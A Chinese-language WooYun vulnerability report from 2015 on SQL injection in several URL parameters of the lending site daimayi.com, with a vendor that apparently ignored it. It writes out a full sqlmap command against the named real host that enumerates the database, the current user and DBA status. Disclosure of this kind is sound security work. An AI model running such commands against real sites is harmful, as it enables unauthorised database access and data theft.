漏洞概要
关注数(24)
关注此漏洞
漏洞标题:贷蚂蚁主站多个参数存在SQL注入漏洞(DBA权限)
提交时间:2015-11-05 08:54
修复时间:2015-11-10 08:56
公开时间:2015-11-10 08:56
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2015-11-05: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
我搜索了,这些没有提交过吧,不会再来一个重复ID?没有信心提交这个网站了!~~~多个参数存在注入点!~~~
详细说明:
地址:
money、deadline、lt、co_id后面的数字存在注入
sqlmap测试
sqlmap.py -u "http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1*" --threads 1 --dbms
"MySQL" --current-db --current-user --is-dba --time-sec 60
由于是延时注入,实在太慢了,就不继续了!
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-11-10 08:56
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无
漏洞评价:
评论